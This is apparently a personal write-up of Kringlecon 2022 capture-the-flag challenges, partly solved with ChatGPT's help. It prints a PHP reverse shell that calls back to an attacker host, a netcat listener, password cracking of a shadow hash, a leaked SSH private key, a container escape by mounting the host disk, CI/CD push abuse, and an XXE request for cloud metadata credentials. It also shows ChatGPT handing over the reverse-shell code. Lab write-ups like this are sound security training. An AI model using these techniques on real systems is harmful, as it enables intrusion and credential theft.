Kringlecon 22 and chatGPT fun

This is my write-up around a couple of Kringlecon22 challenges. I wanted to use chatGPT as much as possible as an experiment for some of these challenges. It's a pretty cool tool to add to your arsenal but it's far from perfect. If you don't know what you're doing, it'll probably point you in the wrong direction. If you know what you're doing, it'll speed up your workflow by providing code/commands you can fix ( suricata rule generation was nice; cracking shadow passwords was cool but didn't mention you had to run unshadow first etc.).

Tolkien ring

PCAP Analysis

1.First question is what type of objects can we export from the pcap?

HTTP

2. What is the filename of the largest file we can export? > app.php

3. What packet number starts the app.php file?

687

4. What is the ip of the Apache server?

?> 192.185.57.242

5. What file is save to the infected host?

'Ref_Sept24-2020.zip'

6.Attackers used bad TLS certificates in this traffic. Which countries were they registered to?

To find that: Use: tls.handshake.type == 11

On packet 808:

1) make sure the setting "Allow subdissector to reassemble TCP streams" is on in the TCP protocol preferences

2) Then go to the packet which contains the SSL handshake message "Certificate" 3) In the packet detail pane, expand the SSL protocol

4) Expand the "Certificate" TLS record

5) Expand the "certificate" handshake protocol

6) Expand the list of certificates. There is now a list of certificate length and certificates (the list could be only 1 certificate). The first certificate is the server certificate, the second it's signing CA, the third the CA that signed the CA, etc.

7) Now rightclick on the certificate that you want to export

8) Choose "Export selected packet bytes..."

9) Choose a filename and click on save

Then convert the DER to PEM using openssl and decode it with openssl or an online tool. We then get the following info:

There's two bad certificates (the other ones are legitimate Microsoft certificates). We rinse and repeat and get the below answers:

Israel, South Sudan

7. Is the host infected?

Yes; See below for details

File extraction:

We download suspicious pcap; See some http, copy the gzip decompressed body as text:

Then we just copy paste the following as well as the function below (with the big atob string to the dev console in chrome/firefox:

function saveAs(blob, fileName) { let url = window.URL.createObjectURL(blob);

let anchorElem = document.createElement('a');
anchorElem.style = 'display: none';
anchorElem.href = url;
anchorElem.download = fileName;

document.body.appendChild(anchorElem);
anchorElem.click();

document.body.removeChild(anchorElem);

// On Edge, revokeObjectURL should be called only after
// a.click() has completed, atleast on EdgeHTML 15.15048
setTimeout(function() {
    window.URL.revokeObjectURL(url);
}, 1000);
}

This downloads 'Ref_Sept24-2020.zip' to our computer which contains a .scr file that gets flagged by windows defender.

DIE tells us it's a RAR archive (probably a self-extracting RAR)

We extract that scr using 7zip and get a couple of interesting files:

Selector.vbs just runs dsep.bat; that renames SLP.txt to h1.rar and extracts it so we do that manually. The bat file tells us the password is "Version"

rename SLP.txt hl.rar
"PLS.exe" e -pVersion hl.rar
timeout 5

start fatless.vbs
timeout 4
del /f /q "hl.rar"
del /f /q "dsep.bat"
del /f /q "C:\Users\mycomp\Desktop\inst.exe"
@exit

Part 2 powershell logs

We filter by task category and notice the following:

With that, we understand that recipe.txt is what the attacker is after. We search for recipe.txt and see events on the 12/24/2022 tied to recipe.txt being deleted.

Knowing this, we can now apply a filter for events after 12/23/2022 to remove noise.

For question 3, I couldn't find the right command using Windows event log viewer; That's because the GUI abstracts some of the info. Using grep I managed to find the answer:

1. When did the attack occur? >12/24/2022

2. What is the filename from which the attacker read secrets? > Recipe.txt

3. $foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}

4. $foo | Add-Content -Path 'Recipe'

>Recipe.txt

6. Were any files deleted? >Yes

7. Was the file from 2) deleted? >No

8. What is the eventId of the logs that show the attacker's commands being run? >4104

9. Is the secret ingredient compromised? > Yes

10.What is the secret ingredient? >honey

Suricata rules

My first rule to match adv[.]epostoday[.]uk was:

alert dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns_query; content:"adv.epostoday.uk"; nocase; metadata:created_at 2019_05_15, updated_at 2019_05_15; classtype:trojan-activity; sid:1234; rev:1;)

For the second rule to match 192[.]185[.]57[.]242

I decided to try this the modern way and asked ChatGPT ( https://chat.openai.com/chat ):

This didn't work and I got:

So I submitted the error to chatGPT:

This still didn't work; I tried using http instead of the "ip" key word and removed both "flow" and "content" this matched 454 packets out of 681.

alert http 192.185.57.242 any -> $HOME_NET any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:12345; rev:1;)

For the second indicator, we flagged 454 packet(s), but we expected 681. Please try again!

Not sure what was missing there and I thought I might be matching traffic in one direction only. I asked chatGPT:

That obviously didn't work but the error gave me the answer:

Bi-direction is <> instead of ->

So we change our rule to:

````

alert http 192.185.57.242 any <> $HOME_NET any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:12345; rev:1;)

Third rule being asked is:

We heard that some naughty actors are using TLS certificates with a specific CN. Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya. When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection

Hmm... Pretty good start this time. I changed it a bit using https://suricata.readthedocs.io/en/suricata-6.0.0/rules/tls-keywords.html and got:

alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content: "CN=heardbellith.Icanwepeh.nagoya";)

Which worked nicely

OK, one more to rule them all and in the darkness find them. Let's watch for one line from the JavaScript: let byteCharacters = atob Oh, and that string might be GZip compressed - I hope that's OK! Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection

ChatGPT returns the following with this prompt:

"Write a rule to watch for one line from the JavaScript: "let byteCharacters = atob" This string might be gzip compressed. Please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection"

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Suspicious JavaScript function, possible Dridex infection"; content:"let byteCharacters = atob"; flow:established,to_server; http_content_type; content: "text/javascript"; http_accept_encoding; content: "gzip";)

Nice start but I had to change it to:

alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection";file_data; content:"let byteCharacters = atob"; )

As according to the docs file_data matches strings even for gziped content.

Elven ring

Git

I tried the below and got a permission denied error:

Trying orc_admin came from browsing the repo at https://haugfactory.com/orcadmin and finding this user. Again, I tried using ChatGPT.

That didn't work; So I went to the gitlab website and pressed the clone button to get the http command:

Terminal prompts below to answer:

Container escape

The challenge logs us in a container jail. Goal is to escape and probably read a flag somewhere. I tried using ChatGPT but it was not super helpfull; https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation gave me some pretty good tips towards getting this to work!

First I performed basic recon:

The asked ChatGPT:

I tried all of the above but they were all pretty useless.

Let's keep going with recon:

Connecting to that second ip on port 2222 asks us for samways password. We can use hashcat or jon to try and get that. The entry in /etc/shado file is:

samways:$6$BRdK69UoIKU9YNPO$fUAXgJXgm68OEASm0354QS/fFkhTHFkswGAT9mrJMY0L8vEw53Ija9lsisesYy0Ja4h/bg1M6fEfVbF3zzgCL.:19363::::::

Couple of prompts for ChatGPT asking it to crack our password:

What is a bit disappointing here is that chatGPT didn't mention you need to unshadow the message.

Ok so with all that said and done, we run:

unshadow.exe passwd.txt shadow.txt > unshadowed.txt
john.exe --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

After a while we end up with:

password is samways... duh!

Unfortunately, trying to ssh to that machine didn't work.

Running ps, we see s6-supervise processes

We know running sudo su gets us root.

We look at capabilities:

grinchum-land:/home/samways# cat /proc/self/status

We check devices in /dev

grinchum-land:/home/samways# ls /dev
autofs           loop0   nvram     tty1   tty20  tty31  tty42  tty53  tty7     vcs5   vcsu3
btrfs-control    loop1   ptmx      tty10  tty21  tty32  tty43  tty54  tty8     vcs6   vcsu4
core             loop2   ptp0      tty11  tty22  tty33  tty44  tty55  tty9     vcsa   vcsu5
cpu              loop3   pts       tty12  tty23  tty34  tty45  tty56  ttyS0    vcsa1  vcsu6
cpu_dma_latency  loop4   random    tty13  tty24  tty35  tty46  tty57  uhid     vcsa2  vda
cuse             loop5   shm       tty14  tty25  tty36  tty47  tty58  uinput   vcsa3  vsock
fd               loop6   snapshot  tty15  tty26  tty37  tty48  tty59  urandom  vcsa4  zero
full             loop7   stderr    tty16  tty27  tty38  tty49  tty6   vcs      vcsa5
fuse             mem     stdin     tty17  tty28  tty39  tty5   tty60  vcs1     vcsa6
input            mqueue  stdout    tty18  tty29  tty4   tty50  tty61  vcs2     vcsu
kmsg             net     tty       tty19  tty3   tty40  tty51  tty62  vcs3     vcsu1
loop-control     null    tty0      tty2   tty30  tty41  tty52  tty63  vcs4     vcsu2

And we try mounting vda to /mnt:

grinchum-land:/dev# ls /mnt/
bin   dev  home  lib32  libx32      media  opt   root  sbin  sys  usr
boot  etc  lib   lib64  lost+found  mnt    proc  run   srv   tmp  var

/mnt/home shows the user jailer -> Nice!

At this point we could try cracking /etc/shadow and /etc/passwd; Another option is adding a user and hash in there;

I poked around /home/jailer and ran cat on the private ssh key:

grinchum-land:/dev# ls -al /mnt/home/jailer/.ssh/jail.key.priv 
-rw-rw-rw- 1 root root 1555 Nov  3 23:36 /mnt/home/jailer/.ssh/jail.key.priv
grinchum-land:/dev# cat /mnt/home/jailer/.ssh/jail.key.priv 

                Congratulations! 

          You've found the secret for the 
          HHC22 container escape challenge!

                     .--._..--.
              ___   ( _'-_  -_.'
          _.-'   `-._|  - :- |
      _.-'           `--...__|
   .-'                       '--..___
  / `._                              \
   `. `._               one           |
     `. `._                           /
       '. `._    :__________....-----'
         `..`---'    |-_  _- |___...----..._
                     |_....--'             `.`.
               _...--'                       `.`.
          _..-'                             _.'.'
       .-'             step                _.'.'
       |                               _.'.'
       |                   __....------'-'
       |     __...------''' _|
       '--'''        |-  - _ |
               _.-''''''''''''''''''-._
            _.'                        |\
          .'                         _.' |
          `._          closer           |:.'
            `._                     _.' |
               `..__                 |  |
                    `---.._.--.    _|  |
                     | _   - | `-.._|_.'
          .--...__   |   -  _|
         .'_      `--.....__ |
        .'_                 `--..__
       .'_                         `.
      .'_    082bb339ec19de4935867   `-.
      `--..____                        _`.
               ```--...____          _..--'
                     | - _ ```---.._.'
                     |   - _ |
                     |_ -  - |
                     |   - _ |
                     | -_  -_|
                     |   - _ |
                     |   - _ |
                     | -_  -_|

Oh... Well ok then! As you can see, chatGPT wasn't great there;

CI/CD pipeline

The prompt gives us the following:

Greetings Noble Player, 

Many thanks for answering our desperate cry for help!

You may have heard that some evil Sporcs have opened up a web-store selling 
counterfeit banners and flags of the many noble houses found in the land of 
the North! They have leveraged some dastardly technology to power their 
storefront, and this technology is known as PHP! 

***gasp*** 

This strorefront utilizes a truly despicable amount of resources to keep the 
website up. And there is only a certain type of Christmas Magic capable of 
powering such a thing… an Elfen Ring!

Along with PHP there is something new we've not yet seen in our land. 
A technology called Continuous Integration and Continuous Deployment! 

Be wary! 

Many fair elves have suffered greatly but in doing so, they've managed to 
secure you a persistent connection on an internal network. 

BTW take excellent notes! 

Should you lose your connection or be discovered and evicted the 
elves can work to re-establish persistence. In fact, the sound off fans
and the sag in lighting tells me all the systems are booting up again right now.  

Please, for the sake of our Holiday help us recover the Ring and save Christmas!

We do some recon again:

grinchum-land:~$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0    208    64 ?        Ss   00:09   0:00 /package/admin/s6/command/s6-svscan -d4 -- /run/service
root          15  0.0  0.0    212    64 ?        S    00:09   0:00 s6-supervise s6-linux-init-shutdownd
root          16  0.0  0.0    200     4 ?        Ss   00:09   0:00 /package/admin/s6-linux-init/command/s6-linux-init-shutdownd -c /run/s6/basedir -g 3000 -C -B
root          34  0.0  0.0    212    64 ?        S    00:09   0:00 s6-supervise log-openssh-server
root          35  0.0  0.0    212    64 ?        S    00:09   0:00 s6-supervise s6rc-fdholder
root          36  0.0  0.0    212    60 ?        S    00:09   0:00 s6-supervise s6rc-oneshot-runner
root          37  0.0  0.0    212    64 ?        S    00:09   0:00 s6-supervise svc-openssh-server
root          48  0.0  0.0    520   152 ?        Ss   00:09   0:00 /package/admin/s6-2.11.1.2/command/s6-fdholderd -1 -i data/rules
root          51  0.0  0.0    188     4 ?        Ss   00:09   0:00 /package/admin/s6/command/s6-ipcserverd -1 -- /package/admin/s6/command/s6-ipcserver-access -v0 -E -l0 -i data/rules -- /package/admin/s6/comman
samways      157  0.0  0.0    276     4 ?        Ss   00:09   0:00 s6-log n30 s10000000 S30000000 T !gzip -nq9 /config/logs/openssh
samways      162  0.0  0.0   4716  3808 ?        Ss   00:09   0:00 sshd.pam: /usr/sbin/sshd.pam -D -e -p 2222 [listener] 0 of 10-100 startups
samways      184  0.0  0.0   4732  3920 ?        Ss   00:09   0:00 sshd.pam: samways [priv]
samways      186  0.0  0.0   4968  3080 ?        S    00:09   0:00 sshd.pam: samways@pts/0
samways      187  0.0  0.0   2592  2212 pts/0    Ss   00:09   0:00 -bash
samways      190  0.0  0.0   1708   872 pts/0    R+   00:11   0:00 ps aux

Running git clone on this, we can't resolve the domain.

We run ifconfig and see we have nmap on the host. Asking ChatGPT:

grinchum-land:/home/samways# nmap -sn 172.18.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 00:26 GMT
Nmap scan report for 172.18.0.1
Host is up (0.00013s latency).
MAC Address: 02:42:0A:F2:58:85 (Unknown)
Nmap scan report for wordpress-db.local_docker_network (172.18.0.87)
Host is up (0.000055s latency).
MAC Address: 02:42:AC:12:00:57 (Unknown)
Nmap scan report for wordpress.local_docker_network (172.18.0.88)
Host is up (0.000037s latency).
MAC Address: 02:42:AC:12:00:58 (Unknown)
Nmap scan report for gitlab.local_docker_network (172.18.0.150)
Host is up (0.000039s latency).
MAC Address: 02:42:AC:12:00:96 (Unknown)
Nmap scan report for grinchum-land.flag.net.internal (172.18.0.99)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.86 seconds

Nmap scan on one of these ips:

grinchum-land:~$ nmap 172.18.0.150
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 00:37 GMT
Nmap scan report for gitlab.local_docker_network (172.18.0.150)
Host is up (0.00037s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8181/tcp open  intermapper

Nice; we now know what the gitlab domain is. Let's clone it

grinchum-land:/home/samways# git clone http://172.18.0.150/rings-of-powder/wordpress.flag.net.interna
l.git
Cloning into 'wordpress.flag.net.internal'...
remote: Enumerating objects: 10195, done.
remote: Total 10195 (delta 0), reused 0 (delta 0), pack-reused 10195
Receiving objects: 100% (10195/10195), 36.49 MiB | 21.78 MiB/s, done.
Resolving deltas: 100% (1799/1799), done.
Updating files: 100% (9320/9320), done.
grinchum-land:/home/samways# ls
wordpress.flag.net.internal

grinchum-land:/home/samways/wordpress.flag.net.internal# ls
index.php        wp-admin              wp-config.php  wp-links-opml.php  wp-settings.php
license.txt      wp-blog-header.php    wp-content     wp-load.php        wp-signup.php
readme.html      wp-comments-post.php  wp-cron.php    wp-login.php       wp-trackback.php
wp-activate.php  wp-config-sample.php  wp-includes    wp-mail.php        xmlrpc.php

git log outputs the following:

commit 37b5d575bf81878934adb937a4fff0d32a8da105 (HEAD -> main, origin/main, origin/HEAD)
Author: knee-oh <sporx@kringlecon.com>
Date:   Wed Oct 26 13:58:15 2022 -0700

    updated wp-config

commit a59cfe83522c9aeff80d49a0be2226f4799ed239
Author: knee-oh <sporx@kringlecon.com>
Date:   Wed Oct 26 12:41:05 2022 -0700

    update gitlab.ci.yml

commit a968d32c0b58fd64744f8698cbdb60a97ec604ed
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 16:43:48 2022 -0700

    test

commit 7093aad279fc4b57f13884cf162f7d80f744eea5
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 15:08:14 2022 -0700

    add gitlab-ci

commit e2208e4bae4d41d939ef21885f13ea8286b24f05
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:43:53 2022 -0700

    big update

commit e19f653bde9ea3de6af21a587e41e7a909db1ca5
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:42:54 2022 -0700

    whoops

commit abdea0ebb21b156c01f7533cea3b895c26198c98
Author: knee-oh <sporx@kringlecon.com>
Date:   Tue Oct 25 13:42:13 2022 -0700

    added assets

commit a7d8f4de0c594a0bbfc963bf64ab8ac8a2f166ca
Author: knee-oh <sporx@kringlecon.com>
Date:   Mon Oct 24 17:32:07 2022 -0700

    init commit

The woops commit seems interesting;

# git diff e19f653bde9ea3de6af21a587e41e7a909d
b1ca5 abdea0ebb21b156c01f7533cea3b895c26198c98

Author: knee-oh <sporx@kringlecon.com>
diff --git a/.ssh/.deploy b/.ssh/.deploy
new file mode 100644
index 0000000..3f7a9e3
--- /dev/null
+++ b/.ssh/.deploy
@@ -0,0 +1,7 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
+QyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4gAAAJiQFTn3kBU5
+9wAAAAtzc2gtZWQyNTUxOQAAACD+wLHSOxzr5OKYjnMC2Xw6LT6gY9rQ6vTQXU1JG2Qa4g
+AAAEBL0qH+iiHi9Khw6QtD6+DHwFwYc50cwR0HjNsfOVXOcv7AsdI7HOvk4piOcwLZfDot
+PqBj2tDq9NBdTUkbZBriAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
+-----END OPENSSH PRIVATE KEY-----
diff --git a/.ssh/.deploy.pub b/.ssh/.deploy.pub
new file mode 100644
index 0000000..8c0b43c
--- /dev/null
+++ b/.ssh/.deploy.pub
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.co
m

We try to ssh to the gitlab host

grinchum-land:~$ ssh -i .ssh/deploy.pem sporx@172.18.0.150sporx@172.18.0.150: Permission denied (publickey).

Ok, that didn't work; let's try the wordpress host:

grinchum-land:~$ ssh -i .ssh/deploy.pem sporx@172.18.0.88
sporx@172.18.0.88's password: 


grinchum-land:~$ ssh -i .ssh/deploy.pem 172.18.0.88
samways@172.18.0.88's password: 

Ok, that didn't work...

Lets look for creds in wp:

No interesting creds as they're pulled from variables.

Then I remembered this was about CI/CD deployments; let's try to commit to the repo:

grinchum-land:/home/samways/wordpress.flag.net.internal# git status
On branch main
Your branch is up to date with 'origin/main'.

Changes not staged for commit:
  (use "git add <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        modified:   readme.html

no changes added to commit (use "git add" and/or "git commit -a")
grinchum-land:/home/samways/wordpress.flag.net.internal# git add *
grinchum-land:/home/samways/wordpress.flag.net.internal# git commit test
error: pathspec 'test' did not match any file(s) known to git
grinchum-land:/home/samways/wordpress.flag.net.internal# git commit -m test
[main e042b3a] test
 Committer: root <root@grinchum-land.flag.net.internal>
Your name and email address were configured automatically based
on your username and hostname. Please check that they are accurate.
You can suppress this message by setting them explicitly. Run the
following command and follow the instructions in your editor to edit
your configuration file:

    git config --global --edit

After doing this, you may fix the identity used for this commit with:

    git commit --amend --reset-author

 1 file changed, 1 insertion(+)
grinchum-land:/home/samways/wordpress.flag.net.internal# 

Ok; I think I need to commit as sporx@kringlecon.com using that pem key; let's try that

``` grinchum-land:~/myrepo$ git remote set-url origin ssh://sporx@172.18.0.150/rings-of-powder/wordpress.flag.net.internal.git```

grinchum-land:~/sporx-clone$ cat .gitlab-ci.yml 
stages:
  - deploy

deploy-job:      
  stage: deploy 
  environment: production
  script:
    - rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html

After seeing the gitlab docs https://docs.gitlab.com/ee/user/ssh.html I ran the following:

Nice! Now we run:

 git config --global user.email "sporx@kringlecon.com"
 git config --global user.name "knee-oh"
 git clone git@@172.18.0.150:/rings-of-powder/wordpress.flag.net.internal.git
 touch temp
 git add *
 git commit -m "evil commit"
 git push

Awesome! We just pushed our commit which is now getting deployed.

Now we just need to upload a reverse shell to pwn this! We can just use a simple php shell payload

We launch a screen with a netcat listener:

screen
nc -nlvp 1234

Add our shell from chatGPT:

Curl our website (to trigger the php code) and wait...

The above fcloses the socket so I asked chatGPT:

And got the following code:

<?php
// PHP Reverse Shell
$ip = '$ip'; // CHANGE THIS
$port = $port; // CHANGE THIS

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if(!$sock) {
    die("$errstr ($errno)");
}

// Send shell commands to attacker
$data = "User: " . get_current_user();
$data .= "\n";
$data .= "Directory: " . getcwd();
$data .= "\n";
$data .= "Shell: " . $_SERVER['SHELL'];
$data .= "\n\n";
fwrite($sock, $data);

// Start an infinite loop to continuously send commands to the attacker
while(1) {
    fwrite($sock, "shell> ");
    $cmd = fread($sock, 1024);
    $output = shell_exec($cmd);
    fwrite($sock, $output);
}

We look at / and find flag.txt a cat returns the elven ring!!!!

Web Ring

Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Tolkien Ring for hints.

Pretty obvious mass hits to /login.html with POST requests; indicator of a bruteforce attack.

Bad ip is 18.222.86.32

The first attack is a brute force login. What's the first username tried?

We use the following filter in Wireshark:

The next attack is forced browsing where the naughty one is guessing URLs. What's the first successful URL path in this attack?

In the txt file, we look for lots of 404 coming from the bad IP and look for the next 202 success right after:

The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

There's a couple of XXE attacks (and technically file:///etc/passwd can be considered a uri ) but the first successfull attacker submitted URI through that XXE/SSRF is:

http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Which is meant to grab an ec2 instance's IMDS credentials (note that if they used IMDSV2, this wouldn't have happened)

Boria mine locks

We're faced with JS implemented locks;

We open the dev console;

First set of chars is in an html comment:

@&@&&W&&W&&&&

Second lock has the following comment:

So we understand we probably need to perform some kind of injection?

We try to draw the line by injecting svg and play with width and coords to tie both edges together:

<svg height="210" width="500">
  <line x1="0" y1="70" x2="250" y2="170" stroke="white" stroke-width="5" />
</svg>

The next box has the following html comment:

TODO: FILTER OUT JAVASCRIPT FROM USER INPUT

So we understand that we need to inject js; Maybe we can create the same svg payload as above through js.

Lock 3 also has the following CSP applied to it:

I used the following SO post as a base: https://stackoverflow.com/questions/20539196/creating-svg-elements-dynamically-with-javascript-inside-html

Setting the background style to blue works:

<script>document.body.style.color="blue"; document.body.style.backgroundColor = "blue"; </script>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>
<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>

For the next one we see a sanitize input method:

We check the sanitizeInput() code:

 <script>
        const sanitizeInput = () => {
            const input = document.querySelector('.inputTxt');
            const content = input.value;
            input.value = content
                .replace(/"/, '')
                .replace(/'/, '')
                .replace(/</, '')
                .replace(/>/, '');
        }
    </script>

Ok so we can't use " ' < or > ; Or we can just ignore the sanitizeInput() js by removing it in the html code prior to submission

For pin4 I used the below but had to disable the sanitizeInput() function before submission:

  <script>document.body.style.backgroundImage = 'linear-gradient(to top,white 0%,white 70%,blue 70%,blue 100%)';</script><h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>

For pin5 I used:

<script>document.body.style.color="blue"; document.body.style.lineHeight = "0.90em";</script>
<font size="6"><br><br><br><br>&#160&#160&#160&#160&#160&#160&#160&#160&#160&&&&</font><br><font size="6">&#160&#160&#160&#160&#160&#160&&W</font><br><font size="7">&#160&&W</font><font color="blue"size="5">&#160&#160&#160&#160&#160&&&&</font><br><font size="6">&#160@</font><font color="blue" size="6">&#160&#160&#160&#160&#160&&W</font><br><font size="8">&</font><font color="blue" size="6">&#160&#160&#160&&W</font><br><font size="8">@</font><font color="blue" size="7">&#160@</font><br><font color="blue" size="6">&#160&#160&#160&</font><br><font color="blue" size="6">&#160&#160@</font>